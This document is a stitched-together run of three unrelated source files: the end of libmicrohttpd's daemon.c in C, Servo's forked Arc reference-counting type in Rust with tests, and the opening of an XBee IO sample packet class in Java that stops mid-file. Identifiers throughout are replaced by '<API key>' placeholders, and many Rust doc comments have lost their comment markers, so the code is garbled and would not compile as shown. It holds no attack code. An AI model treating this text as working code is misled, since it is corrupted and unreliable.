#endif
case <API key>:
<API key> (daemon);
if (daemon->worker_pool)
{
/* Collect the connection information stored in the workers. */
unsigned int i;
daemon->connections = 0;
for (i=0;i<daemon->worker_pool_size;i++)
{
<API key> (&daemon->worker_pool[i]);
daemon->connections += daemon->worker_pool[i].connections;
}
}
return (const union MHD_DaemonInfo *) &daemon->connections;
default:
return NULL;
};
}
/**
* Sets the global error handler to a different implementation. @a cb
* will only be called in the case of typically fatal, serious
* internal consistency issues. These issues should only arise in the
* case of serious memory corruption or similar problems with the
* architecture. While @a cb is allowed to return and MHD will then
* try to continue, this is never safe.
*
* The default implementation that is used if no panic function is set
* simply prints an error message and calls `abort()`. Alternative
* implementations might call `exit()` or other similar functions.
*
* @param cb new error handler
* @param cls passed to @a cb
* @ingroup logging
*/
void
MHD_set_panic_func (MHD_PanicCallback cb, void *cls)
{
mhd_panic = cb;
mhd_panic_cls = cls;
}
/**
* Obtain the version of this library
*
* @return static version string, e.g. "0.9.9"
* @ingroup specialized
*/
const char *
MHD_get_version (void)
{
#ifdef PACKAGE_VERSION
return PACKAGE_VERSION;
#else /* !PACKAGE_VERSION */
static char ver[12] = "\0\0\0\0\0\0\0\0\0\0\0";
if (0 == ver[0])
{
int res = MHD_snprintf_(ver, sizeof(ver), "%x.%x.%x",
(((int)MHD_VERSION >> 24) & 0xFF),
(((int)MHD_VERSION >> 16) & 0xFF),
(((int)MHD_VERSION >> 8) & 0xFF));
if (0 >= res || sizeof(ver) <= res)
return "0.0.0"; /* Can't return real version*/
}
return ver;
#endif /* !PACKAGE_VERSION */
}
/**
* Get information about supported MHD features.
* Indicate that MHD was compiled with or without support for
* particular feature. Some features require additional support
* by kernel. Kernel support is not checked by this function.
*
* @param feature type of requested information
* @return #MHD_YES if feature is supported by MHD, #MHD_NO if
* feature is not supported or feature is unknown.
* @ingroup specialized
*/
_MHD_EXTERN int
<API key>(enum MHD_FEATURE feature)
{
switch(feature)
{
case MHD_FEATURE_MESSGES:
#if HAVE_MESSAGES
return MHD_YES;
#else
return MHD_NO;
#endif
case MHD_FEATURE_SSL:
#if HTTPS_SUPPORT
return MHD_YES;
#else
return MHD_NO;
#endif
case <API key>:
#if HTTPS_SUPPORT && <API key> >= 3
return MHD_YES;
#else
return MHD_NO;
#endif
case MHD_FEATURE_IPv6:
#ifdef HAVE_INET6
return MHD_YES;
#else
return MHD_NO;
#endif
case <API key>:
#if defined(IPPROTO_IPV6) && defined(IPV6_V6ONLY)
return MHD_YES;
#else
return MHD_NO;
#endif
case MHD_FEATURE_POLL:
#ifdef HAVE_POLL_H
return MHD_YES;
#else
return MHD_NO;
#endif
case MHD_FEATURE_EPOLL:
#if EPOLL_SUPPORT
return MHD_YES;
#else
return MHD_NO;
#endif
case <API key>:
#ifdef <API key>
return MHD_YES;
#else
return MHD_NO;
#endif
case <API key>:
#ifdef MHD_DONT_USE_PIPES
return MHD_YES;
#else
return MHD_NO;
#endif
case <API key>:
#ifdef TCP_FASTOPEN
return MHD_YES;
#else
return MHD_NO;
#endif
case <API key>:
#if BAUTH_SUPPORT
return MHD_YES;
#else
return MHD_NO;
#endif
case <API key>:
#if DAUTH_SUPPORT
return MHD_YES;
#else
return MHD_NO;
#endif
case <API key>:
#if HAVE_POSTPROCESSOR
return MHD_YES;
#else
return MHD_NO;
#endif
}
return MHD_NO;
}
#if HTTPS_SUPPORT && <API key> < 0x010600
#if defined(<API key>)
<API key>;
#elif defined(MHD_W32_MUTEX_)
static int gcry_w32_mutex_init (void **ppmtx)
{
*ppmtx = malloc (sizeof (MHD_mutex_));
if (NULL == *ppmtx)
return ENOMEM;
if (MHD_YES != MHD_mutex_create_ ((MHD_mutex_*)*ppmtx))
{
free (*ppmtx);
*ppmtx = NULL;
return EPERM;
}
return 0;
}
static int <API key> (void **ppmtx)
{ int res = (MHD_YES == MHD_mutex_destroy_ ((MHD_mutex_*)*ppmtx)) ? 0 : 1;
free (*ppmtx); return res; }
static int gcry_w32_mutex_lock (void **ppmtx)
{ return (MHD_YES == MHD_mutex_lock_ ((MHD_mutex_*)*ppmtx)) ? 0 : 1; }
static int <API key> (void **ppmtx)
{ return (MHD_YES == MHD_mutex_unlock_ ((MHD_mutex_*)*ppmtx)) ? 0 : 1; }
static struct gcry_thread_cbs gcry_threads_w32 = {
(<API key> | (<API key> << 8)),
NULL, gcry_w32_mutex_init, <API key>,
gcry_w32_mutex_lock, <API key>,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL };
#endif // defined(MHD_W32_MUTEX_)
#endif // HTTPS_SUPPORT && <API key> < 0x010600
/**
* Initialize do setup work.
*/
void MHD_init(void)
{
mhd_panic = &mhd_panic_std;
mhd_panic_cls = NULL;
#ifdef _WIN32
WSADATA wsd;
if (0 != WSAStartup(MAKEWORD(2, 2), &wsd))
MHD_PANIC ("Failed to initialize winsock\n");
mhd_winsock_inited_ = 1;
if (2 != LOBYTE(wsd.wVersion) && 2 != HIBYTE(wsd.wVersion))
MHD_PANIC ("Winsock version 2.2 is not available\n");
#endif
#if HTTPS_SUPPORT
#if <API key> < 0x010600
#if defined(<API key>)
if (0 != gcry_control (<API key>, &<API key>))
MHD_PANIC ("Failed to initialise multithreading in libgcrypt\n");
#elif defined(MHD_W32_MUTEX_)
if (0 != gcry_control (<API key>, &gcry_threads_w32))
MHD_PANIC ("Failed to initialise multithreading in libgcrypt\n");
#endif // defined(MHD_W32_MUTEX_)
gcry_check_version (NULL);
#else
if (NULL == gcry_check_version ("1.6.0"))
MHD_PANIC ("libgcrypt is too old. MHD was compiled for libgcrypt 1.6.0 or newer\n");
#endif
gnutls_global_init ();
#endif
}
void MHD_fini(void)
{
#if HTTPS_SUPPORT
<API key> ();
#endif
#ifdef _WIN32
if (mhd_winsock_inited_)
WSACleanup();
#endif
}
<API key>(MHD_init, MHD_fini);
} // namespace libmicrohttpd
} // namespace microrestd
} // namespace ufal
/* end of daemon.c */ |
// file at the top-level directory of this distribution and at
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Fork of Arc for Servo. This has the following advantages over std::Arc:
//! * We don't waste storage on the weak reference count.
//! * We don't do extra RMU operations to handle the possibility of weak references.
//! * We can experiment with arena allocation (todo).
//! * We can add methods to support our custom use cases [1].
//! * We have support for dynamically-sized types (see <API key>).
//! * We have support for thin arcs to unsized types (see ThinArc).
// The semantics of Arc are alread documented in the Rust docs, so we don't
// duplicate those here.
#![allow(missing_docs)]
#[cfg(feature = "servo")] extern crate serde;
extern crate nodrop;
#[cfg(feature = "servo")]
use heapsize::HeapSizeOf;
use nodrop::NoDrop;
#[cfg(feature = "servo")]
use serde::{Deserialize, Serialize};
use std::{isize, usize};
use std::borrow;
use std::cmp::Ordering;
use std::convert::From;
use std::fmt;
use std::hash::{Hash, Hasher};
use std::iter::{ExactSizeIterator, Iterator};
use std::mem;
use std::ops::{Deref, DerefMut};
use std::process;
use std::ptr;
use std::slice;
use std::sync::atomic;
use std::sync::atomic::Ordering::{Acquire, Relaxed, Release};
// Private macro to get the offset of a struct field in bytes from the address of the struct.
macro_rules! offset_of {
($container:path, $field:ident) => {{
// Make sure the field actually exists. This line ensures that a compile-time error is
// generated if $field is accessed through a Deref impl.
let $container { $field: _, .. };
// Create an (invalid) instance of the container and calculate the offset to its
// field. Using a null pointer might be UB if `&(*(0 as *const T)).field` is interpreted to
// be nullptr deref.
let invalid: $container = ::std::mem::uninitialized();
let offset = &invalid.$field as *const _ as usize - &invalid as *const _ as usize;
// Do not run destructors on the made up invalid instance.
::std::mem::forget(invalid);
offset as isize
}};
}
A soft limit on the amount of references that may be made to an `Arc`.
Going above this limit will abort your program (although not
necessarily) at _exactly_ `MAX_REFCOUNT + 1` references.
const MAX_REFCOUNT: usize = (isize::MAX) as usize;
Wrapper type for pointers to get the non-zero optimization. When
NonZero/Shared/Unique are stabilized, we should just use Shared
here to get the same effect. Gankro is working on this in [1].
It's unfortunate that this needs to infect all the caller types
with 'static. It would be nice to just use a &() and a PhantomData<T>
instead, but then the compiler can't determine whether the &() should
be thin or fat (which depends on whether or not T is sized). Given
that this is all a temporary hack, this restriction is fine for now.
[1] https://github.com/rust-lang/rust/issues/27730
pub struct NonZeroPtrMut<T: ?Sized + 'static>(&'static mut T);
impl<T: ?Sized> NonZeroPtrMut<T> {
pub fn new(ptr: *mut T) -> Self {
assert!(!(ptr as *mut u8).is_null());
NonZeroPtrMut(unsafe { mem::transmute(ptr) })
}
pub fn ptr(&self) -> *mut T {
self.0 as *const T as *mut T
}
}
impl<T: ?Sized + 'static> Clone for NonZeroPtrMut<T> {
fn clone(&self) -> Self {
NonZeroPtrMut::new(self.ptr())
}
}
impl<T: ?Sized + 'static> fmt::Pointer for NonZeroPtrMut<T> {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Pointer::fmt(&self.ptr(), f)
}
}
impl<T: ?Sized + 'static> fmt::Debug for NonZeroPtrMut<T> {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
<Self as fmt::Pointer>::fmt(self, f)
}
}
impl<T: ?Sized + 'static> PartialEq for NonZeroPtrMut<T> {
fn eq(&self, other: &Self) -> bool {
self.ptr() == other.ptr()
}
}
impl<T: ?Sized + 'static> Eq for NonZeroPtrMut<T> {}
pub struct Arc<T: ?Sized + 'static> {
p: NonZeroPtrMut<ArcInner<T>>,
}
An Arc that is known to be uniquely owned
This lets us build arcs that we can mutate before
freezing, without needing to change the allocation
pub struct UniqueArc<T: ?Sized + 'static>(Arc<T>);
impl<T> UniqueArc<T> {
#[inline]
Construct a new UniqueArc
pub fn new(data: T) -> Self {
UniqueArc(Arc::new(data))
}
#[inline]
Convert to a shareable Arc<T> once we're done using it
pub fn shareable(self) -> Arc<T> {
self.0
}
}
impl<T> Deref for UniqueArc<T> {
type Target = T;
fn deref(&self) -> &T {
&*self.0
}
}
impl<T> DerefMut for UniqueArc<T> {
fn deref_mut(&mut self) -> &mut T {
// We know this to be uniquely owned
unsafe { &mut (*self.0.ptr()).data }
}
}
unsafe impl<T: ?Sized + Sync + Send> Send for Arc<T> {}
unsafe impl<T: ?Sized + Sync + Send> Sync for Arc<T> {}
struct ArcInner<T: ?Sized> {
count: atomic::AtomicUsize,
data: T,
}
unsafe impl<T: ?Sized + Sync + Send> Send for ArcInner<T> {}
unsafe impl<T: ?Sized + Sync + Send> Sync for ArcInner<T> {}
impl<T> Arc<T> {
#[inline]
pub fn new(data: T) -> Self {
let x = Box::new(ArcInner {
count: atomic::AtomicUsize::new(1),
data: data,
});
Arc { p: NonZeroPtrMut::new(Box::into_raw(x)) }
}
pub fn into_raw(this: Self) -> *const T {
let ptr = unsafe { &((*this.ptr()).data) as *const _ };
mem::forget(this);
ptr
}
pub unsafe fn from_raw(ptr: *const T) -> Self {
// To find the corresponding pointer to the `ArcInner` we need
// to subtract the offset of the `data` field from the pointer.
let ptr = (ptr as *const u8).offset(-offset_of!(ArcInner<T>, data));
Arc {
p: NonZeroPtrMut::new(ptr as *mut ArcInner<T>),
}
}
}
impl<T: ?Sized> Arc<T> {
#[inline]
fn inner(&self) -> &ArcInner<T> {
// This unsafety is ok because while this arc is alive we're guaranteed
// that the inner pointer is valid. Furthermore, we know that the
// `ArcInner` structure itself is `Sync` because the inner data is
// `Sync` as well, so we're ok loaning out an immutable pointer to these
// contents.
unsafe { &*self.ptr() }
}
// Non-inlined part of `drop`. Just invokes the destructor.
#[inline(never)]
unsafe fn drop_slow(&mut self) {
let _ = Box::from_raw(self.ptr());
}
#[inline]
pub fn ptr_eq(this: &Self, other: &Self) -> bool {
this.ptr() == other.ptr()
}
fn ptr(&self) -> *mut ArcInner<T> {
self.p.ptr()
}
}
impl<T: ?Sized> Clone for Arc<T> {
#[inline]
fn clone(&self) -> Self {
// Using a relaxed ordering is alright here, as knowledge of the
// original reference prevents other threads from erroneously deleting
// the object.
// As explained in the [Boost documentation][1], Increasing the
// reference counter can always be done with <API key>: New
// references to an object can only be formed from an existing
// reference, and passing an existing reference from one thread to
// another must already provide any required synchronization.
let old_size = self.inner().count.fetch_add(1, Relaxed);
// However we need to guard against massive refcounts in case someone
// is `mem::forget`ing Arcs. If we don't do this the count can overflow
// and users will use-after free. We racily saturate to `isize::MAX` on
// the assumption that there aren't ~2 billion threads incrementing
// the reference count at once. This branch will never be taken in
// any realistic program.
// We abort because such a program is incredibly degenerate, and we
// don't care to support it.
if old_size > MAX_REFCOUNT {
process::abort();
}
Arc { p: NonZeroPtrMut::new(self.ptr()) }
}
}
impl<T: ?Sized> Deref for Arc<T> {
type Target = T;
#[inline]
fn deref(&self) -> &T {
&self.inner().data
}
}
impl<T: Clone> Arc<T> {
#[inline]
pub fn make_mut(this: &mut Self) -> &mut T {
if !this.is_unique() {
// Another pointer exists; clone
*this = Arc::new((**this).clone());
}
unsafe {
// This unsafety is ok because we're guaranteed that the pointer
// returned is the *only* pointer that will ever be returned to T. Our
// reference count is guaranteed to be 1 at this point, and we required
// the Arc itself to be `mut`, so we're returning the only possible
// reference to the inner data.
&mut (*this.ptr()).data
}
}
}
impl<T: ?Sized> Arc<T> {
#[inline]
pub fn get_mut(this: &mut Self) -> Option<&mut T> {
if this.is_unique() {
unsafe {
// See make_mut() for documentation of the threadsafety here.
Some(&mut (*this.ptr()).data)
}
} else {
None
}
}
#[inline]
fn is_unique(&self) -> bool {
// We can use Relaxed here, but the justification is a bit subtle.
// The reason to use Acquire would be to synchronize with other threads
// that are modifying the refcount with Release, i.e. to ensure that
// their writes to memory guarded by this refcount are flushed. However,
// we know that threads only modify the contents of the Arc when they
// observe the refcount to be 1, and no other thread could observe that
// because we're holding one strong reference here.
self.inner().count.load(Relaxed) == 1
}
}
impl<T: ?Sized> Drop for Arc<T> {
#[inline]
fn drop(&mut self) {
// Because `fetch_sub` is already atomic, we do not need to synchronize
// with other threads unless we are going to delete the object.
if self.inner().count.fetch_sub(1, Release) != 1 {
return;
}
// FIXME(bholley): Use the updated comment when [2] is merged.
// This load is needed to prevent reordering of use of the data and
// deletion of the data. Because it is marked `Release`, the decreasing
// of the reference count synchronizes with this `Acquire` load. This
// means that use of the data happens before decreasing the reference
// count, which happens before this load, which happens before the
// deletion of the data.
// As explained in the [Boost documentation][1],
// > It is important to enforce any possible access to the object in one
// > thread (through an existing reference) to *happen before* deleting
// > the object in a different thread. This is achieved by a "release"
// > operation after dropping a reference (any access to the object
// > through this reference must obviously happened before), and an
// > "acquire" operation before deleting the object.
self.inner().count.load(Acquire);
unsafe {
self.drop_slow();
}
}
}
impl<T: ?Sized + PartialEq> PartialEq for Arc<T> {
fn eq(&self, other: &Arc<T>) -> bool {
*(*self) == *(*other)
}
fn ne(&self, other: &Arc<T>) -> bool {
*(*self) != *(*other)
}
}
impl<T: ?Sized + PartialOrd> PartialOrd for Arc<T> {
fn partial_cmp(&self, other: &Arc<T>) -> Option<Ordering> {
(**self).partial_cmp(&**other)
}
fn lt(&self, other: &Arc<T>) -> bool {
*(*self) < *(*other)
}
fn le(&self, other: &Arc<T>) -> bool {
*(*self) <= *(*other)
}
fn gt(&self, other: &Arc<T>) -> bool {
*(*self) > *(*other)
}
fn ge(&self, other: &Arc<T>) -> bool {
*(*self) >= *(*other)
}
}
impl<T: ?Sized + Ord> Ord for Arc<T> {
fn cmp(&self, other: &Arc<T>) -> Ordering {
(**self).cmp(&**other)
}
}
impl<T: ?Sized + Eq> Eq for Arc<T> {}
impl<T: ?Sized + fmt::Display> fmt::Display for Arc<T> {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Display::fmt(&**self, f)
}
}
impl<T: ?Sized + fmt::Debug> fmt::Debug for Arc<T> {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Debug::fmt(&**self, f)
}
}
impl<T: ?Sized> fmt::Pointer for Arc<T> {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Pointer::fmt(&self.ptr(), f)
}
}
impl<T: Default> Default for Arc<T> {
fn default() -> Arc<T> {
Arc::new(Default::default())
}
}
impl<T: ?Sized + Hash> Hash for Arc<T> {
fn hash<H: Hasher>(&self, state: &mut H) {
(**self).hash(state)
}
}
impl<T> From<T> for Arc<T> {
fn from(t: T) -> Self {
Arc::new(t)
}
}
impl<T: ?Sized> borrow::Borrow<T> for Arc<T> {
fn borrow(&self) -> &T {
&**self
}
}
impl<T: ?Sized> AsRef<T> for Arc<T> {
fn as_ref(&self) -> &T {
&**self
}
}
// This is what the HeapSize crate does for regular arc, but is questionably
#[cfg(feature = "servo")]
impl<T: HeapSizeOf> HeapSizeOf for Arc<T> {
fn <API key>(&self) -> usize {
(**self).<API key>()
}
}
#[cfg(feature = "servo")]
impl<'de, T: Deserialize<'de>> Deserialize<'de> for Arc<T>
{
fn deserialize<D>(deserializer: D) -> Result<Arc<T>, D::Error>
where
D: ::serde::de::Deserializer<'de>,
{
T::deserialize(deserializer).map(Arc::new)
}
}
#[cfg(feature = "servo")]
impl<T: Serialize> Serialize for Arc<T>
{
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: ::serde::ser::Serializer,
{
(**self).serialize(serializer)
}
}
Structure to allow Arc-managing some fixed-sized data and a variably-sized
slice in a single allocation.
#[derive(Debug, Eq, PartialEq, PartialOrd)]
pub struct HeaderSlice<H, T: ?Sized> {
The fixed-sized data.
pub header: H,
The dynamically-sized data.
pub slice: T,
}
#[inline(always)]
fn divide_rounding_up(dividend: usize, divisor: usize) -> usize {
(dividend + divisor - 1) / divisor
}
impl<H, T> Arc<HeaderSlice<H, [T]>> {
Creates an Arc for a HeaderSlice using the given header struct and
iterator to generate the slice. The resulting Arc will be fat.
#[inline]
pub fn <API key><I>(header: H, mut items: I) -> Self
where I: Iterator<Item=T> + ExactSizeIterator
{
use ::std::mem::size_of;
assert!(size_of::<T>() != 0, "Need to think about ZST");
// Compute the required size for the allocation.
let num_items = items.len();
let size = {
// First, determine the alignment of a hypothetical pointer to a
// HeaderSlice.
let <API key>: usize = mem::align_of::<ArcInner<HeaderSlice<H, [T; 1]>>>();
// Next, synthesize a totally garbage (but properly aligned) pointer
// to a sequence of T.
let fake_slice_ptr = <API key> as *const T;
// Convert that sequence to a fat pointer. The address component of
// the fat pointer will be garbage, but the length will be correct.
let fake_slice = unsafe { slice::from_raw_parts(fake_slice_ptr, num_items) };
// Pretend the garbage address points to our allocation target (with
// a trailing sequence of T), rather than just a sequence of T.
let fake_ptr = fake_slice as *const [T] as *const ArcInner<HeaderSlice<H, [T]>>;
let fake_ref: &ArcInner<HeaderSlice<H, [T]>> = unsafe { &*fake_ptr };
// Use size_of_val, which will combine static information about the
// type with the length from the fat pointer. The garbage address
// will not be used.
mem::size_of_val(fake_ref)
};
let ptr: *mut ArcInner<HeaderSlice<H, [T]>>;
unsafe {
// Allocate the buffer. We use Vec because the underlying allocation
// machinery isn't available in stable Rust.
// To avoid alignment issues, we allocate words rather than bytes,
// rounding up to the nearest word size.
let buffer = if mem::align_of::<T>() <= mem::align_of::<usize>() {
Self::allocate_buffer::<usize>(size)
} else if mem::align_of::<T>() <= mem::align_of::<u64>() {
// On 32-bit platforms <T> may have 8 byte alignment while usize has 4 byte aligment.
// Use u64 to avoid over-alignment.
// This branch will compile away in optimized builds.
Self::allocate_buffer::<u64>(size)
} else {
panic!("Over-aligned type not handled");
};
// Synthesize the fat pointer. We do this by claiming we have a direct
// pointer to a [T], and then changing the type of the borrow. The key
// point here is that the length portion of the fat pointer applies
// only to the number of elements in the dynamically-sized portion of
// the type, so the value will be the same whether it points to a [T]
// or something else with a [T] as its last member.
let fake_slice: &mut [T] = slice::from_raw_parts_mut(buffer as *mut T, num_items);
ptr = fake_slice as *mut [T] as *mut ArcInner<HeaderSlice<H, [T]>>;
// Write the data.
// Note that any panics here (i.e. from the iterator) are safe, since
// we'll just leak the uninitialized memory.
ptr::write(&mut ((*ptr).count), atomic::AtomicUsize::new(1));
ptr::write(&mut ((*ptr).data.header), header);
let mut current: *mut T = &mut (*ptr).data.slice[0];
for _ in 0..num_items {
ptr::write(current, items.next().expect("ExactSizeIterator over-reported length"));
current = current.offset(1);
}
assert!(items.next().is_none(), "ExactSizeIterator under-reported length");
// We should have consumed the buffer exactly.
debug_assert!(current as *mut u8 == buffer.offset(size as isize));
}
// Return the fat Arc.
assert_eq!(size_of::<Self>(), size_of::<usize>() * 2, "The Arc will be fat");
Arc { p: NonZeroPtrMut::new(ptr) }
}
#[inline]
unsafe fn allocate_buffer<W>(size: usize) -> *mut u8 {
let words_to_allocate = divide_rounding_up(size, mem::size_of::<W>());
let mut vec = Vec::<W>::with_capacity(words_to_allocate);
vec.set_len(words_to_allocate);
Box::into_raw(vec.into_boxed_slice()) as *mut W as *mut u8
}
}
Header data with an inline length. Consumers that use HeaderWithLength as the
Header type in HeaderSlice can take advantage of ThinArc.
#[derive(Debug, Eq, PartialEq, PartialOrd)]
pub struct HeaderWithLength<H> {
The fixed-sized data.
pub header: H,
The slice length.
length: usize,
}
impl<H> HeaderWithLength<H> {
Creates a new HeaderWithLength.
pub fn new(header: H, length: usize) -> Self {
HeaderWithLength {
header: header,
length: length,
}
}
}
type <API key><H, T> = HeaderSlice<HeaderWithLength<H>, T>;
pub struct ThinArc<H: 'static, T: 'static> {
ptr: *mut ArcInner<<API key><H, [T; 1]>>,
}
unsafe impl<H: Sync + Send, T: Sync + Send> Send for ThinArc<H, T> {}
unsafe impl<H: Sync + Send, T: Sync + Send> Sync for ThinArc<H, T> {}
// Synthesize a fat pointer from a thin pointer.
// See the comment around the analogous operation in <API key>.
fn thin_to_thick<H, T>(thin: *mut ArcInner<<API key><H, [T; 1]>>)
-> *mut ArcInner<<API key><H, [T]>>
{
let len = unsafe { (*thin).data.header.length };
let fake_slice: *mut [T] = unsafe {
slice::from_raw_parts_mut(thin as *mut T, len)
};
fake_slice as *mut ArcInner<<API key><H, [T]>>
}
impl<H: 'static, T: 'static> ThinArc<H, T> {
Temporarily converts |self| into a bonafide Arc and exposes it to the
provided callback. The refcount is not modified.
#[inline(always)]
pub fn with_arc<F, U>(&self, f: F) -> U
where F: FnOnce(&Arc<<API key><H, [T]>>) -> U
{
// Synthesize transient Arc, which never touches the refcount of the ArcInner.
let transient = NoDrop::new(Arc {
p: NonZeroPtrMut::new(thin_to_thick(self.ptr))
});
// Expose the transient Arc to the callback, which may clone it if it wants.
let result = f(&transient);
// Forget the transient Arc to leave the refcount untouched.
mem::forget(transient);
// Forward the result.
result
}
}
impl<H, T> Deref for ThinArc<H, T> {
type Target = <API key><H, [T]>;
fn deref(&self) -> &Self::Target {
unsafe { &(*thin_to_thick(self.ptr)).data }
}
}
impl<H: 'static, T: 'static> Clone for ThinArc<H, T> {
fn clone(&self) -> Self {
ThinArc::with_arc(self, |a| Arc::into_thin(a.clone()))
}
}
impl<H: 'static, T: 'static> Drop for ThinArc<H, T> {
fn drop(&mut self) {
let _ = Arc::from_thin(ThinArc { ptr: self.ptr });
}
}
impl<H: 'static, T: 'static> Arc<<API key><H, [T]>> {
Converts an Arc into a ThinArc. This consumes the Arc, so the refcount
is not modified.
pub fn into_thin(a: Self) -> ThinArc<H, T> {
assert!(a.header.length == a.slice.len(),
"Length needs to be correct for ThinArc to work");
let fat_ptr: *mut ArcInner<<API key><H, [T]>> = a.ptr();
mem::forget(a);
let thin_ptr = fat_ptr as *mut [usize] as *mut usize;
ThinArc {
ptr: thin_ptr as *mut ArcInner<<API key><H, [T; 1]>>
}
}
Converts a ThinArc into an Arc. This consumes the ThinArc, so the refcount
is not modified.
pub fn from_thin(a: ThinArc<H, T>) -> Self {
let ptr = thin_to_thick(a.ptr);
mem::forget(a);
Arc {
p: NonZeroPtrMut::new(ptr)
}
}
}
impl<H: PartialEq + 'static, T: PartialEq + 'static> PartialEq for ThinArc<H, T> {
fn eq(&self, other: &ThinArc<H, T>) -> bool {
ThinArc::with_arc(self, |a| {
ThinArc::with_arc(other, |b| {
*a == *b
})
})
}
}
impl<H: Eq + 'static, T: Eq + 'static> Eq for ThinArc<H, T> {}
#[cfg(test)]
mod tests {
use std::clone::Clone;
use std::ops::Drop;
use std::sync::atomic;
use std::sync::atomic::Ordering::{Acquire, SeqCst};
use super::{Arc, HeaderWithLength, ThinArc};
#[derive(PartialEq)]
struct Canary(*mut atomic::AtomicUsize);
impl Drop for Canary {
fn drop(&mut self) {
unsafe { (*self.0).fetch_add(1, SeqCst); }
}
}
#[test]
fn slices_and_thin() {
let mut canary = atomic::AtomicUsize::new(0);
let c = Canary(&mut canary as *mut atomic::AtomicUsize);
let v = vec![5, 6];
let header = HeaderWithLength::new(c, v.len());
{
let x = Arc::into_thin(Arc::<API key>(header, v.into_iter()));
let y = ThinArc::with_arc(&x, |q| q.clone());
let _ = y.clone();
let _ = x == x;
Arc::from_thin(x.clone());
}
assert!(canary.load(Acquire) == 1);
}
} |
package com.digi.xbee.api.packet.common;
import java.io.<API key>;
import java.io.IOException;
import java.util.Arrays;
import java.util.LinkedHashMap;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import com.digi.xbee.api.exceptions.<API key>;
import com.digi.xbee.api.io.IOLine;
import com.digi.xbee.api.io.IOSample;
import com.digi.xbee.api.models.XBee16BitAddress;
import com.digi.xbee.api.models.XBee64BitAddress;
import com.digi.xbee.api.packet.APIFrameType;
import com.digi.xbee.api.packet.XBeeAPIPacket;
import com.digi.xbee.api.utils.ByteUtils;
import com.digi.xbee.api.utils.HexUtils;
/**
* This class represents an IO Data Sample RX Indicator packet. Packet is built
* using the parameters of the constructor or providing a valid API payload.
*
* <p>When the module receives an IO sample frame from a remote device, it
* sends the sample out the UART using this frame type (when AO=0). Only modules
* running API firmware will send IO samples out the UART.</p>
*
* <p>Among received data, some options can also be received indicating
* transmission parameters.</p>
*
* @see com.digi.xbee.api.models.XBeeReceiveOptions
* @see com.digi.xbee.api.packet.XBeeAPIPacket
*/
public class <API key> extends XBeeAPIPacket {
// Constants.
private static final int <API key> = 12; // 1 (Frame type) + 8 (32-bit address) + 2 (16-bit address) + 1 (receive options)
// Variables.
private final XBee64BitAddress sourceAddress64;
private final XBee16BitAddress sourceAddress16;
private IOSample ioSample;
private final int receiveOptions;
private byte[] rfData;
private Logger logger;
/**
* Creates a new {@code <API key>} object from the
* given payload.
*
* @param payload The API frame payload. It must start with the frame type
* corresponding to a IO Data Sample RX Indicator packet ({@code 0x92}).
* The byte array must be in {@code OperatingMode.API} mode.
*
* @return Parsed IO Data Sample Rx Indicator packet.
*
* @throws <API key> if {@code payload[0] != APIFrameType.<API key>.getValue()} or
* if {@code payload.length < }{@value #<API key>} or
* if {@code receiveOptions < 0} or
* if {@code receiveOptions > 255}.
* @throws <API key> if {@code payload == null}.
*/
public static <API key> createPacket(byte[] payload) {
if (payload == null)
throw new <API key>("IO Data Sample RX Indicator packet payload cannot be null.");
// 1 (Frame type) + 8 (32-bit address) + 2 (16-bit address) + 1 (receive options)
if (payload.length < <API key>)
throw new <API key>("Incomplete IO Data Sample RX Indicator packet.");
if ((payload[0] & 0xFF) != APIFrameType.<API key>.getValue())
throw new <API key>("Payload is not a IO Data Sample RX Indicator packet.");
// payload[0] is the frame type.
int index = 1;
// 2 bytes of 16-bit address.
XBee64BitAddress sourceAddress64 = new XBee64BitAddress(Arrays.copyOfRange(payload, index, index + 8));
index = index + 8;
// 2 bytes of 16-bit address.
XBee16BitAddress sourceAddress16 = new XBee16BitAddress(payload[index] & 0xFF, payload[index + 1] & 0xFF);
index = index + 2;
// Receive options
int receiveOptions = payload[index] & 0xFF;
index = index + 1;
// Get data.
byte[] data = null;
if (index < payload.length)
data = Arrays.copyOfRange(payload, index, payload.length);
return new <API key>(sourceAddress64, sourceAddress16, receiveOptions, data);
}
/**
* Class constructor. Instantiates a new
* {@code <API key>} object with the given parameters.
*
* @param sourceAddress64 64-bit address of the sender.
* @param sourceAddress16 16-bit address of the sender.
* @param receiveOptions Receive options.
* @param rfData Received RF data.
*
* @throws <API key> if {@code receiveOptions < 0} or
* if {@code receiveOptions > 255}.
* @throws <API key> if {@code sourceAddress64 == null} or
* if {@code sourceAddress16 == null}.
*
* @see com.digi.xbee.api.models.XBeeReceiveOptions
* @see com.digi.xbee.api.models.XBee16BitAddress
* @see com.digi.xbee.api.models.XBee64BitAddress
*/
public <API key>(XBee64BitAddress sourceAddress64, XBee16BitAddress sourceAddress16, int receiveOptions, byte[] rfData) {
super(APIFrameType.<API key>);
if (sourceAddress64 == null)
throw new <API key>("64-bit source address cannot be null.");
if (sourceAddress16 == null)
throw new <API key>("16-bit source address cannot be null.");
if (receiveOptions < 0 || receiveOptions > 255)
throw new <API key>("Receive options value must be between 0 and 255.");
this.sourceAddress64 = sourceAddress64;
this.sourceAddress16 = sourceAddress16;
this.receiveOptions = receiveOptions;
this.rfData = rfData;
if (rfData != null && rfData.length >= 5)
ioSample = new IOSample(rfData);
else
ioSample = null;
this.logger = LoggerFactory.getLogger(<API key>.class);
}
/*
* (non-Javadoc)
* @see com.digi.xbee.api.packet.XBeeAPIPacket#getAPIData()
*/
@Override
protected byte[] <API key>() {
<API key> os = new <API key>();
try {
os.write(sourceAddress64.getValue());
os.write(sourceAddress16.getValue());
os.write(receiveOptions);
if (rfData != null)
os.write(rfData);
} catch (IOException e) {
logger.error(e.getMessage(), e);
}
return os.toByteArray();
}
/*
* (non-Javadoc)
* @see com.digi.xbee.api.packet.XBeeAPIPacket#needsAPIFrameID()
*/
@Override
public boolean needsAPIFrameID() {
return false;
}
/*
* (non-Javadoc)
* @see com.digi.xbee.api.packet.XBeeAPIPacket#isBroadcast()
*/
@Override
public boolean isBroadcast() {
return ByteUtils.isBitEnabled(getReceiveOptions(), 1);
}
/**
